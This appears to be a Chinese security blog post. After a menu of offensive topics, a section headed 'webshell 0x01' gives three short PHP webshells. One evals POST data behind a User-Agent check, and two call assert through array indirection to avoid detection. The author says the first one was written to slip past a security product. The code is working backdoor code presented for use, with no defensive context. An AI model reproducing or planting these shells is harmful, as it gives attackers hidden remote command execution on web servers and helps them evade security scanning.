WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

Javaweb

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

PWN

CTF

heap

其它

关于博客

面试

杂谈

webshell

0x01

1
2
3
4
<?php 
if($_SERVER[HTTP_USER_AGENT]==="123"){
eval(reset(get_defined_vars()[_POST]));};
?>
1
2
3
4
5
6
<?php
function shell(){
return ($_POST['pass']);
}
$ss = array('fuck', 'assert');
$ss[1](shell());
1
2
3
4
<?php
define('cmd', $_POST['cmd']);
$array = ['assert'];
$array[0](cmd);

自己第一个写的过长亭